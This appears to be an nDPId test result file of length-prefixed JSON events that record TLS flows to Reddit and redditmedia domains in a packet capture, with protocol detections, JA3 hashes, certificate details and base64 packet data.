+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686301,"flow_last_seen":1605291686301,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686301,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605291686301,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686301,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML0AAAAAoAL9IDDZAAACBAWgBAIICql05vEAAAAAAQMDBw=="} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605291686327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686327,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBFWUkNzC+oBJXgILuAAACBAV4AQMDAwQCCArC1zmoqXTm8Q=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1605291686327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686327,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3ML5BwRVmgBAB+wbmAAABAQgKqXTnC8LXOag="} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1211,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686301,"flow_last_seen":1605291686327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686327,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1398,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686301,"flow_last_seen":1605291686419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686419,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686301,"flow_last_seen":1605291686420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686420,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"b.thumbs.redditmedia.com","server_names":"*.thumbs.redditmedia.com,thumbs.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.thumbs.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:F4:6C:CF:D6:FD:64:3E:50:17:A2:DE:B0:F2:B6:9B:76:59:C6:75"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1605291686985,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686985,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD88AAAAAoAL9IJsfAAACBAWgBAIIClRf4AwAAAAAAQMDBw=="} 
+00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686985,"flow_last_seen":1605291686985,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686985,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 